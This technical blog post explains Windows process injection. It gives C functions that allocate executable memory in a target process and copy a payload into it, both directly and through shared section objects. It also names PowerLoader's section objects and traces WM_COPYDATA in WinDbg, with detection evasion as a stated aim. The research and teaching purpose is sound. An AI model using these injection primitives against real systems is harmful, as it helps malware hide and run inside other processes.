Introduction
The last post discussed some of the problems encountered when writing a payload for process injection. This post discusses deploying the payload into the memory space of a target process for execution. One can use the conventional Win32 API for this task, which some of you will already be familiar with, but there’s also the potential to be creative with unconventional approaches. For example, we can use API functions to perform read and write operations they weren’t originally intended for, which might help evade detection. There are various ways to deploy and execute a payload, but not all are simple to use. Let’s first focus on the conventional API that, despite being relatively easy to detect, is still popular among threat actors.
Below is a screenshot of VMMap from Sysinternals showing the types of memory allocated on the system I’ll be working on (Windows 10). Some of this memory has the potential to be used for storage of a payload.

Allocating virtual memory
Each process has its own virtual address space. Shared memory exists between processes, but in general, process A should not be able to view the virtual memory of process B without assistance from the Kernel. The Kernel can of course see the virtual memory of all processes because it has to perform virtual to physical memory translation. Process A can allocate new virtual memory in the address space of process B using Virtual Memory API that is then handled internally by the Kernel. Some of you may be familiar with the following steps to deploy a payload in virtual memory of another process.
- Open a target process using OpenProcess or NtOpenProcess.
- Allocate eXecute-Read-Write (XRW) memory in a target process using VirtualAllocEx or NtAllocateVirtualMemory.
- Copy a payload to the new memory using WriteProcessMemory or NtWriteVirtualMemory.
- Execute payload.
- De-allocate XRW memory in target process using VirtualFreeEx or NtFreeVirtualMemory.
- Close target process handle with CloseHandle or NtClose.
The following uses the Win32 API. It only shows the allocation of XRW memory and the writing of the payload to the new memory.
PVOID CopyPayload1(HANDLE hp, LPVOID payload, ULONG payloadSize) {
    LPVOID ptr = NULL;
    SIZE_T tmp;

    // 1. allocate memory
    ptr = VirtualAllocEx(hp, NULL, payloadSize,
        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    // 2. write payload
    WriteProcessMemory(hp, ptr, payload, payloadSize, &tmp);

    return ptr;
}
Alternatively using the Nt/Zw API.
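LPVOID CopyPayload2(HANDLE hp, LPVOID payload, ULONG payloadSize) {
    LPVOID   ptr = NULL;
    SIZE_T   len = payloadSize;   // RegionSize is passed as a pointer to SIZE_T
    SIZE_T   tmp;
    NTSTATUS nt;

    // 1. allocate memory
    // protection values are single constants and cannot be combined with OR
    nt = NtAllocateVirtualMemory(hp, &ptr, 0, &len,
        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (nt < 0) return NULL;      // negative NTSTATUS indicates failure

    // 2. write payload
    NtWriteVirtualMemory(hp, ptr, payload, payloadSize, &tmp);

    return ptr;
}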
Although not shown here, an additional operation to remove Write permissions of the virtual memory might be used.
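One detail worth spelling out is that Windows page protection values are separate constants rather than flags to be OR-ed together, so executable and writable memory is requested with the single PAGE_EXECUTE_READWRITE value. The following is a minimal, portable sketch of checking a protection value and of deciding whether a region is both writable and executable. The constant values are the ones from winnt.h, repeated so the code builds without the Windows headers; the two helper names are hypothetical and not part of any API.

```c
#include <assert.h>
#include <stdint.h>

/* Base protection values as defined in winnt.h. */
#define PAGE_NOACCESS          0x01u
#define PAGE_READONLY          0x02u
#define PAGE_READWRITE         0x04u
#define PAGE_WRITECOPY         0x08u
#define PAGE_EXECUTE           0x10u
#define PAGE_EXECUTE_READ      0x20u
#define PAGE_EXECUTE_READWRITE 0x40u
#define PAGE_EXECUTE_WRITECOPY 0x80u

/* Hypothetical helper: a base protection is valid only if exactly one
 * of the eight low bits is set. Modifiers such as PAGE_GUARD live in
 * the higher bits and are ignored here. */
int is_valid_base_protection(uint32_t protect)
{
    uint32_t base = protect & 0xFFu;
    return base != 0 && (base & (base - 1)) == 0;
}

/* Hypothetical helper: true for the two protections that allow both
 * writing and executing, which is what scanners tend to look for. */
int is_writable_executable(uint32_t protect)
{
    uint32_t base = protect & 0xFFu;
    return base == PAGE_EXECUTE_READWRITE || base == PAGE_EXECUTE_WRITECOPY;
}
```

With these helpers, PAGE_EXECUTE | PAGE_READWRITE (0x14) is rejected as a base protection, while PAGE_EXECUTE_READ is accepted and is no longer reported as writable and executable.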
Create a section object
Another way is using section objects. What does Microsoft say about them?
A section object represents a section of memory that can be shared. A process can use a section object to share parts of its memory address space (memory sections) with other processes. Section objects also provide the mechanism by which a process can map a file into its memory address space.
Although the use of these API functions in a regular application can be an indication of something malicious, threat actors will continue to use them for process injection.
- Create a new section object using NtCreateSection and assign to S.
- Map a view of S for attacking process using NtMapViewOfSection and assign to B1.
- Map a view of S for target process using NtMapViewOfSection and assign to B2.
- Copy a payload to B1.
- Unmap B1.
- Close S
- Return pointer to B2.
LPVOID CopyPayload3(HANDLE hp, LPVOID payload, ULONG payloadSize) {
    HANDLE        s;
    LPVOID        ba1 = NULL, ba2 = NULL;
    SIZE_T        vs = 0;         // ViewSize is passed as a pointer to SIZE_T
    LARGE_INTEGER li;

    li.HighPart = 0;
    li.LowPart  = payloadSize;

    // 1. create a new section
    NtCreateSection(&s, SECTION_ALL_ACCESS, NULL, &li,
        PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);

    // 2. map view of section for current process
    NtMapViewOfSection(s, GetCurrentProcess(), &ba1, 0, 0, 0, &vs,
        ViewShare, 0, PAGE_EXECUTE_READWRITE);

    // 3. map view of section for target process
    NtMapViewOfSection(s, hp, &ba2, 0, 0, 0, &vs,
        ViewShare, 0, PAGE_EXECUTE_READWRITE);

    // 4. copy payload to section of memory
    memcpy(ba1, payload, payloadSize);

    // 5. unmap memory in the current process
    ZwUnmapViewOfSection(GetCurrentProcess(), ba1);

    // 6. close section
    ZwClose(s);

    // 7. return pointer to payload in target process space
    return ba2;
}
Using an existing section object and ROP chain
The PowerLoader malware used existing shared section objects created by explorer.exe to store a payload. Because those objects only have Read-Write permissions, it’s possible to copy a payload to the memory, but not to execute it directly. PowerLoader got around this with a Return Oriented Programming (ROP) chain.
The following section names were used by PowerLoader for code injection.
"\BaseNamedObjects\ShimSharedMemory"
"\BaseNamedObjects\windows_shell_global_counters"
"\BaseNamedObjects\MSCTF.Shared.SFM.MIH"
"\BaseNamedObjects\MSCTF.Shared.SFM.AMF"
"\BaseNamedObjects\UrlZonesSM_Administrator"
"\BaseNamedObjects\UrlZonesSM_SYSTEM"
- Open existing section of memory in target process using NtOpenSection
- Map view of section using NtMapViewOfSection
- Copy payload to memory
- Use a ROP chain to execute
UI Shared Memory
With PowerLoaderEx, enSilo demonstrated using UI shared memory for process injection. Injection on Steroids: Codeless code injection and 0-day techniques provides more details of how it works. It uses the desktop heap to inject the payload into explorer.exe.
Reading a Desktop Heap Overview over at MSDN, we can see there’s already shared memory between processes for the User Interface.
Every desktop object has a single desktop heap associated with it. The desktop heap stores certain user interface objects, such as windows, menus, and hooks. When an application requires a user interface object, functions within user32.dll are called to allocate those objects. If an application does not depend on user32.dll, it does not consume desktop heap.
Using a code cave
Host Intrusion Prevention Systems (HIPS) will regard the use of VirtualAllocEx/WriteProcessMemory as suspicious activity, and this is likely why the authors of PowerLoader used existing section objects. PowerLoader likely inspired the authors behind AtomBombing to use a code cave in a Dynamic-link Library (DLL) for storing a payload and using a ROP chain for execution.
AtomBombing uses a combination of GlobalAddAtom, GlobalGetAtomName and NtQueueApcThread to deploy a payload into a target process. The execution is accomplished using a ROP chain and SetThreadContext. What other ways could one deploy a payload without using the standard approach?
Interprocess Communication (IPC) can be used to share data with another process. Some of the ways this can be achieved include:
- Clipboard (WM_PASTE)
- Data Copy (WM_COPYDATA)
- Named pipes
- Component Object Model (COM)
- Remote Procedure Call (RPC)
- Dynamic Data Exchange (DDE)
For the purpose of this post, I decided to examine WM_COPYDATA, but in hindsight, I think COM might be a better line of enquiry.
Data can be legitimately shared between GUI processes via the WM_COPYDATA message, but can it be used for process injection? SendMessage and PostMessage are two APIs that can be used to write data into a remote process space without explicitly opening the target process and copying data there using Virtual Memory API. (WM_COPYDATA itself has to be sent with SendMessage.)
Kernel Attacks through User-Mode Callbacks, presented at Black Hat 2011 by Tarjei Mandt, led me to examine the potential for using the KernelCallbackTable located in the Process Environment Block (PEB) for process injection. This field is initialized to an array of functions when user32.dll is loaded into a GUI process, and this is where I initially started looking after learning how window messages are dispatched by the kernel.
With WinDbg attached to notepad, obtain the address of the PEB.
0:001> !peb
PEB at 0000009832e49000
Dumping this in the windows debugger shows the following details. What we’re interested in here is the KernelCallbackTable, so I’ve stripped out most of the fields.
0:001> dt !_PEB 0000009832e49000
ntdll!_PEB
   +0x000 InheritedAddressSpace : 0 ''
   +0x001 ReadImageFileExecOptions : 0 ''
   +0x002 BeingDebugged    : 0x1 ''
   // details stripped out
   +0x050 ReservedBits0    : 0y0000000000000000000000000 (0)
   +0x054 Padding1         : [4] ""
   +0x058 KernelCallbackTable : 0x00007ffd6afc3070 Void
   +0x058 UserSharedInfoPtr : 0x00007ffd6afc3070 Void
If we dump the memory at that field (PEB+0x58) using the dps command, which displays pointers with symbols, we see that 0x00007ffd6afc3070 resolves to USER32!apfnDispatch.
0:001> dps $peb+58
0000009832e49058  00007ffd6afc3070 USER32!apfnDispatch
0000009832e49060  0000000000000000
0000009832e49068  0000029258490000
0000009832e49070  0000000000000000
0000009832e49078  00007ffd6c0fc2e0 ntdll!TlsBitMap
0000009832e49080  000003ffffffffff
0000009832e49088  00007df45c6a0000
0000009832e49090  0000000000000000
0000009832e49098  00007df45c6a0730
0000009832e490a0  00007df55e7d0000
0000009832e490a8  00007df55e7e0228
0000009832e490b0  00007df55e7f0650
0000009832e490b8  0000000000000001
0000009832e490c0  ffffe86d079b8000
0000009832e490c8  0000000000100000
0000009832e490d0  0000000000002000
Closer inspection of USER32!apfnDispatch reveals an array of functions.
0:001> dps USER32!apfnDispatch
00007ffd6afc3070  00007ffd6af62bd0 USER32!_fnCOPYDATA
00007ffd6afc3078  00007ffd6afbae70 USER32!_fnCOPYGLOBALDATA
00007ffd6afc3080  00007ffd6af60420 USER32!_fnDWORD
00007ffd6afc3088  00007ffd6af65680 USER32!_fnNCDESTROY
00007ffd6afc3090  00007ffd6af696a0 USER32!_fnDWORDOPTINLPMSG
00007ffd6afc3098  00007ffd6afbb4a0 USER32!_fnINOUTDRAG
00007ffd6afc30a0  00007ffd6af65d40 USER32!_fnGETTEXTLENGTHS
00007ffd6afc30a8  00007ffd6afbb220 USER32!_fnINCNTOUTSTRING
00007ffd6afc30b0  00007ffd6afbb750 USER32!_fnINCNTOUTSTRINGNULL
00007ffd6afc30b8  00007ffd6af675c0 USER32!_fnINLPCOMPAREITEMSTRUCT
00007ffd6afc30c0  00007ffd6af641f0 USER32!__fnINLPCREATESTRUCT
00007ffd6afc30c8  00007ffd6afbb2e0 USER32!_fnINLPDELETEITEMSTRUCT
00007ffd6afc30d0  00007ffd6af6bc00 USER32!__fnINLPDRAWITEMSTRUCT
00007ffd6afc30d8  00007ffd6afbb330 USER32!_fnINLPHELPINFOSTRUCT
00007ffd6afc30e0  00007ffd6afbb330 USER32!_fnINLPHELPINFOSTRUCT
00007ffd6afc30e8  00007ffd6afbb430 USER32!_fnINLPMDICREATESTRUCT
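The addresses in the two dumps follow simple arithmetic: the KernelCallbackTable field sits at offset 0x58 in the 64-bit PEB, and each slot of the table is one 8-byte pointer. As a small sketch (the function names are hypothetical, and the offset and pointer size are taken from the x64 debugger output above rather than from any header):

```c
#include <assert.h>
#include <stdint.h>

/* Offset of KernelCallbackTable in the 64-bit PEB, per the dt output. */
#define PEB64_KERNEL_CALLBACK_TABLE 0x58u
/* Size of one table entry on x64. */
#define SLOT_SIZE 8u

/* Address of the PEB field that holds the table pointer. */
uint64_t peb_callback_table_field(uint64_t peb)
{
    return peb + PEB64_KERNEL_CALLBACK_TABLE;
}

/* Address of slot `index` inside the callback table. */
uint64_t callback_slot_address(uint64_t table, unsigned index)
{
    return table + (uint64_t)index * SLOT_SIZE;
}
```

For the session shown here, the PEB at 0x9832e49000 gives a field address of 0x9832e49058, slot 0 (USER32!_fnCOPYDATA) is at 0x7ffd6afc3070 and slot 15 is at 0x7ffd6afc30e8, matching the dps listings.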
The first function, USER32!_fnCOPYDATA, is called when process A sends the WM_COPYDATA message to a window belonging to process B. The kernel will dispatch the message, along with its parameters, to the target window handle, where it will be handled by the window procedure associated with it.
0:001> u USER32!_fnCOPYDATA
USER32!_fnCOPYDATA:
00007ffd6af62bd0 4883ec58        sub     rsp,58h
00007ffd6af62bd4 33c0            xor     eax,eax
00007ffd6af62bd6 4c8bd1          mov     r10,rcx
00007ffd6af62bd9 89442438        mov     dword ptr [rsp+38h],eax
00007ffd6af62bdd 4889442440      mov     qword ptr [rsp+40h],rax
00007ffd6af62be2 394108          cmp     dword ptr [rcx+8],eax
00007ffd6af62be5 740b            je      USER32!_fnCOPYDATA+0x22 (00007ffd6af62bf2)
00007ffd6af62be7 48394120        cmp     qword ptr [rcx+20h],rax
Set a breakpoint on this function and continue execution.
0:001> bp USER32!_fnCOPYDATA
0:001> g
The following piece of code will send the WM_COPYDATA message to notepad. Compile and run it.
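#include <windows.h>

int main(void) {
    COPYDATASTRUCT cds;
    HWND           hw;
    WCHAR          msg[] = L"I don't know what to say!\n";

    // find the main window of a running notepad instance
    hw = FindWindowExW(NULL, NULL, L"Notepad", NULL);

    if (hw != NULL) {
        cds.dwData = 1;
        // size in bytes, not counting the null terminator
        cds.cbData = lstrlenW(msg) * sizeof(WCHAR);
        cds.lpData = msg;

        // copy data to notepad memory space
        SendMessageW(hw, WM_COPYDATA, (WPARAM)hw, (LPARAM)&cds);
    }
    return 0;
}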
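The cbData field is a byte count, not a character count, which is why the length is doubled for a wide string. A portable sketch of that calculation follows, assuming the text is plain ASCII so that every character becomes exactly one 2-byte UTF-16 code unit. The helper name is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: number of bytes an ASCII string occupies once
 * stored as UTF-16, optionally counting the 2-byte null terminator. */
size_t utf16_bytes_for_ascii(const char *s, int include_terminator)
{
    size_t units = strlen(s) + (include_terminator ? 1u : 0u);
    return units * 2u;
}
```

For the 26-character message used in this post the result is 52 bytes (0x34) without the terminator. Passing 1 as the second argument would also copy the terminator, giving 54 bytes.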
Once this code executes, it will attempt to find the window handle of Notepad before sending it the WM_COPYDATA message, and this will trigger our breakpoint in the debugger. The call stack shows where the call originated from; in this case it’s KiUserCallbackDispatcherContinue. Based on the x64 calling convention, the arguments are placed in RCX, RDX, R8 and R9.
Breakpoint 0 hit
USER32!_fnCOPYDATA:
00007ffd6af62bd0 4883ec58        sub     rsp,58h
0:000> k
 # Child-SP          RetAddr           Call Site
00 0000009832caf618 00007ffd6c03dbc4 USER32!_fnCOPYDATA
01 0000009832caf620 00007ffd688d1144 ntdll!KiUserCallbackDispatcherContinue
02 0000009832caf728 00007ffd6af61b0b win32u!NtUserGetMessage+0x14
03 0000009832caf730 00007ff79cc13bed USER32!GetMessageW+0x2b
04 0000009832caf790 00007ff79cc29333 notepad!WinMain+0x291
05 0000009832caf890 00007ffd6bb23034 notepad!__mainCRTStartup+0x19f
06 0000009832caf950 00007ffd6c011431 KERNEL32!BaseThreadInitThunk+0x14
07 0000009832caf980 0000000000000000 ntdll!RtlUserThreadStart+0x21
0:000> r
rax=00007ffd6af62bd0 rbx=0000000000000000 rcx=0000009832caf678
rdx=00000000000000b0 rsi=0000000000000000 rdi=0000000000000000
rip=00007ffd6af62bd0 rsp=0000009832caf618 rbp=0000009832caf829
 r8=0000000000000000  r9=00007ffd6afc3070 r10=0000000000000000
r11=0000000000000244 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
USER32!_fnCOPYDATA:
00007ffd6af62bd0 4883ec58        sub     rsp,58h
Dumping the contents of first parameter in the RCX register shows some recognizable data sent by the example program. notepad!NPWndProc is obviously the callback procedure associated with the target window receiving WM_COPYDATA.
0:000> dps rcx
0000009832caf678  00000038000000b0
0000009832caf680  0000000000000001
0000009832caf688  0000000000000000
0000009832caf690  0000000000000070
0000009832caf698  0000000000000000
0000009832caf6a0  0000029258bbc070
0000009832caf6a8  000000000000004a // WM_COPYDATA
0000009832caf6b0  00000000000c072e
0000009832caf6b8  0000000000000001
0000009832caf6c0  0000000000000001
0000009832caf6c8  0000000000000034
0000009832caf6d0  0000000000000078
0000009832caf6d8  00007ff79cc131b0 notepad!NPWndProc
0000009832caf6e0  00007ffd6c039da0 ntdll!NtdllDispatchMessage_W
0000009832caf6e8  0000000000000058
0000009832caf6f0  006f006400200049
The structure passed to fnCOPYDATA isn’t part of the debugging symbols, but here’s what we’re looking at.
typedef struct _CAPTUREBUF {
    DWORD cbCallback;
    DWORD cbCapture;
    DWORD cCapturedPointers;
    PBYTE pbFree;
    DWORD offPointers;
    PVOID pvVirtualAddress;
} CAPTUREBUF, *PCAPTUREBUF;

typedef struct _FNCOPYDATAMSG {
    CAPTUREBUF     CaptureBuf;
    PWND           pwnd;
    UINT           msg;
    HWND           hwndFrom;
    BOOL           fDataPresent;
    COPYDATASTRUCT cds;
    ULONG_PTR      xParam;
    PROC           xpfnProc;
} FNCOPYDATAMSG;
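To relate these fields to the raw dump, it helps to know the offset of each member on x64. The sketch below mirrors the two structures with fixed-width types so it compiles without the Windows headers. The type names ending in 64 are my own, pointers and handles are modelled as uint64_t, and it assumes a 64-bit host where uint64_t members are 8-byte aligned.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Mirror of CAPTUREBUF with x64 field sizes (hypothetical name). */
typedef struct {
    uint32_t cbCallback;        /* 0x00: 0xb0 in the dump            */
    uint32_t cbCapture;         /* 0x04: 0x38                        */
    uint32_t cCapturedPointers; /* 0x08: 1                           */
    uint64_t pbFree;            /* 0x10                              */
    uint32_t offPointers;       /* 0x18: 0x70                        */
    uint64_t pvVirtualAddress;  /* 0x20                              */
} CAPTUREBUF64;

/* Mirror of COPYDATASTRUCT on x64 (hypothetical name). */
typedef struct {
    uint64_t dwData;            /* 1                                 */
    uint32_t cbData;            /* 0x34                              */
    uint64_t lpData;            /* 0x78 before it becomes a pointer  */
} COPYDATASTRUCT64;

/* Mirror of FNCOPYDATAMSG on x64 (hypothetical name). */
typedef struct {
    CAPTUREBUF64     CaptureBuf;
    uint64_t         pwnd;         /* 0x28: loaded via [r10+28h]     */
    uint32_t         msg;          /* 0x30: 0x4a, WM_COPYDATA        */
    uint64_t         hwndFrom;     /* 0x38                           */
    uint32_t         fDataPresent; /* 0x40                           */
    COPYDATASTRUCT64 cds;          /* 0x48                           */
    uint64_t         xParam;       /* 0x60: notepad!NPWndProc        */
    uint64_t         xpfnProc;     /* 0x68: NtdllDispatchMessage_W   */
} FNCOPYDATAMSG64;

/* Compile-time checks against the offsets seen in the debugger. */
_Static_assert(offsetof(FNCOPYDATAMSG64, pwnd) == 0x28, "pwnd");
_Static_assert(offsetof(FNCOPYDATAMSG64, cds) == 0x48, "cds");
_Static_assert(sizeof(FNCOPYDATAMSG64) == 0x70, "size");
```

The computed size of 0x70 agrees with the offPointers value in the dump, and the value stored there (0x58) is the offset of cds.lpData within the message.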
Continue to single-step (t) through the code and examine the contents of the registers.
0:000> r
rax=00007ffd6c039da0 rbx=0000000000000000 rcx=00007ff79cc131b0
rdx=000000000000004a rsi=0000000000000000 rdi=0000000000000000
rip=00007ffd6af62c16 rsp=0000009832caf5c0 rbp=0000009832caf829
 r8=00000000000c072e  r9=0000009832caf6c0 r10=0000009832caf678
r11=0000000000000244 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
USER32!_fnCOPYDATA+0x46:
00007ffd6af62c16 498b4a28        mov     rcx,qword ptr [r10+28h] ds:0000009832caf6a0=0000029258bbc070
0:000> u rcx
notepad!NPWndProc:
00007ff79cc131b0 4055            push    rbp
00007ff79cc131b2 53              push    rbx
00007ff79cc131b3 56              push    rsi
00007ff79cc131b4 57              push    rdi
00007ff79cc131b5 4154            push    r12
00007ff79cc131b7 4155            push    r13
00007ff79cc131b9 4156            push    r14
00007ff79cc131bb 4157            push    r15
We see a pointer to COPYDATASTRUCT is placed in r9.
0:000> dps r9
0000009832caf6c0  0000000000000001
0000009832caf6c8  0000000000000034
0000009832caf6d0  0000009832caf6f0
0000009832caf6d8  00007ff79cc131b0 notepad!NPWndProc
0000009832caf6e0  00007ffd6c039da0 ntdll!NtdllDispatchMessage_W
0000009832caf6e8  0000000000000058
0000009832caf6f0  006f006400200049
0000009832caf6f8  002000740027006e
0000009832caf700  0077006f006e006b
0000009832caf708  0061006800770020
0000009832caf710  006f007400200074
0000009832caf718  0079006100730020
0000009832caf720  00000000000a0021
0000009832caf728  00007ffd6af61b0b USER32!GetMessageW+0x2b
0000009832caf730  0000009800000000
0000009832caf738  0000000000000001
This structure is defined in the debugging symbols, so we can dump it showing the values it contains.
0:000> dt uxtheme!COPYDATASTRUCT 0000009832caf6c0
   +0x000 dwData           : 1
   +0x008 cbData           : 0x34
   +0x010 lpData           : 0x0000009832caf6f0 Void
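Note that lpData held 0x78 when the breakpoint was first hit and holds 0x0000009832caf6f0 now, which is the address of the message buffer (0x9832caf678) plus 0x78. That is consistent with the function turning buffer-relative offsets into pointers, using the table of field offsets that offPointers refers to. The following is only a model of that behaviour inferred from the dumps, not the actual user32 code; the function name is hypothetical and treating each table entry as a 32-bit offset is an assumption.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum {
    OFF_CAPTURED_POINTERS = 0x08, /* CAPTUREBUF.cCapturedPointers */
    OFF_POINTER_TABLE     = 0x18  /* CAPTUREBUF.offPointers       */
};

/* Model: for every entry in the pointer table, add the buffer's base
 * address to the 64-bit value stored at the listed field offset.
 * Returns the number of pointers fixed up, or -1 on a bounds error. */
int fixup_captured_pointers(uint8_t *buf, size_t len, uint64_t base)
{
    uint32_t count, table, i;

    if (len < 0x28)
        return -1;
    memcpy(&count, buf + OFF_CAPTURED_POINTERS, sizeof count);
    memcpy(&table, buf + OFF_POINTER_TABLE, sizeof table);

    for (i = 0; i < count; i++) {
        uint32_t field;   /* offset of the pointer field (assumed 32-bit) */
        uint64_t value;
        size_t   entry = (size_t)table + (size_t)i * sizeof field;

        if (entry + sizeof field > len)
            return -1;
        memcpy(&field, buf + entry, sizeof field);
        if ((size_t)field + sizeof value > len)
            return -1;

        memcpy(&value, buf + field, sizeof value);
        value += base;                      /* offset becomes pointer */
        memcpy(buf + field, &value, sizeof value);
    }
    return (int)count;
}
```

Feeding it a 0xb0-byte buffer with one captured pointer, a table at 0x70 listing field offset 0x58, and 0x78 stored at that field reproduces the value seen in the debugger when the base is 0x9832caf678.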
Finally, examine the lpData field that should contain the string we sent from process A.
0:000> du poi(0000009832caf6c0+10)
0000009832caf6f0  "I don't know what to say!."
We can see this address belongs to the stack allocated when the thread was created.
0:000> !address 0000009832caf6f0
Usage:                  Stack
Base Address:           0000009832c9f000
End Address:            0000009832cb0000
Region Size:            0000000000011000 (  68.000 kB)
State:                  00001000          MEM_COMMIT
Protect:                00000004          PAGE_READWRITE
Type:                   00020000          MEM_PRIVATE
Allocation Base:        0000009832c30000
Allocation Protect:     00000004          PAGE_READWRITE
More info:              ~0k
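The same string can be recovered by hand from the quadwords printed by dps earlier, since each 64-bit value packs four little-endian UTF-16 code units. A small portable sketch of that decoding, assuming ASCII-only text (the function name is hypothetical):

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Decode UTF-16LE code units packed into 64-bit words, lowest 16 bits
 * first, stopping at the first zero unit. Non-ASCII units become '?'.
 * Returns the number of characters written, excluding the terminator. */
size_t qwords_to_ascii(const uint64_t *q, size_t nq, char *out, size_t cap)
{
    size_t n = 0, i;
    int j;

    if (cap == 0)
        return 0;
    for (i = 0; i < nq; i++) {
        for (j = 0; j < 4; j++) {
            uint16_t u = (uint16_t)(q[i] >> (16 * j));
            if (u == 0 || n + 1 >= cap) {   /* end of text or buffer */
                out[n] = '\0';
                return n;
            }
            out[n++] = (u < 0x80) ? (char)u : '?';
        }
    }
    out[n] = '\0';
    return n;
}
```

Applied to the seven values from 0000009832caf6f0 to 0000009832caf720, this yields the 26 characters of the message, ending in the newline that the debugger renders as a dot.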
Examining the Thread Information Block (TIB) that is located in the Thread Environment Block (TEB) provides us with the StackBase and StackLimit.
0:001> dx -r1 (*((uxtheme!_NT_TIB *)0x9832e4a000))
(*((uxtheme!_NT_TIB *)0x9832e4a000))                 [Type: _NT_TIB]
    [+0x000] ExceptionList    : 0x0 [Type: _EXCEPTION_REGISTRATION_RECORD *]
    [+0x008] StackBase        : 0x9832cb0000 [Type: void *]
    [+0x010] StackLimit       : 0x9832c9f000 [Type: void *]
    [+0x018] SubSystemTib     : 0x0 [Type: void *]
    [+0x020] FiberData        : 0x1e00 [Type: void *]
    [+0x020] Version          : 0x1e00 [Type: unsigned long]
    [+0x028] ArbitraryUserPointer : 0x0 [Type: void *]
    [+0x030] Self             : 0x9832e4a000 [Type: _NT_TIB *]
OK, we can use WM_COPYDATA to deploy a payload into a target process IF it has a GUI attached to it, but it’s not useful unless we can execute it. Moreover, the stack is a volatile area of memory and therefore unreliable to use as a code cave. To execute it would require locating the exact address and using a ROP chain. By the time the ROP chain is executed, there’s no guarantee the payload will still be intact. So, we probably can’t use WM_COPYDATA on this occasion, but it’s worth remembering there are likely many ways of sharing a payload with another process using legitimate API that are less suspicious than using WriteProcessMemory or NtWriteVirtualMemory.
In the case of WM_COPYDATA, one would still need to determine the exact address of the payload on the stack. The address of the Thread Environment Block (TEB) can be retrieved via the NtQueryInformationThread API using the ThreadBasicInformation class. After reading TebBaseAddress, the StackLimit and StackBase values can be read from the TEB. In any case, the volatility of the stack means the payload would likely be overwritten before being executed.
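To put numbers on this, the values already captured in the debugger are enough to show where the copied data sits relative to the stack bounds. A short sketch with hypothetical helper names, using plain 64-bit integers for addresses:

```c
#include <assert.h>
#include <stdint.h>

/* The stack grows down: valid addresses lie in [StackLimit, StackBase). */
int address_in_stack(uint64_t addr, uint64_t stack_limit, uint64_t stack_base)
{
    return addr >= stack_limit && addr < stack_base;
}

/* Distance from an address up to another address above it. */
uint64_t bytes_below(uint64_t addr, uint64_t upper)
{
    return upper - addr;
}
```

With StackLimit 0x9832c9f000 and StackBase 0x9832cb0000, the string at 0x9832caf6f0 is inside the stack, 0x910 bytes below the base and only 0xd8 bytes above the RSP value recorded when the breakpoint was hit (0x9832caf618). Memory that close to the active frames is reused as soon as the thread makes further calls.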
Summary
Avoiding the conventional API used to deploy and execute a payload increases the difficulty of detection. PowerLoader used a code cave in an existing section object and a ROP chain for execution. PowerLoaderEx, which is a PoC, used the desktop heap, while the AtomBombing PoC uses a code cave in the .data section of a DLL.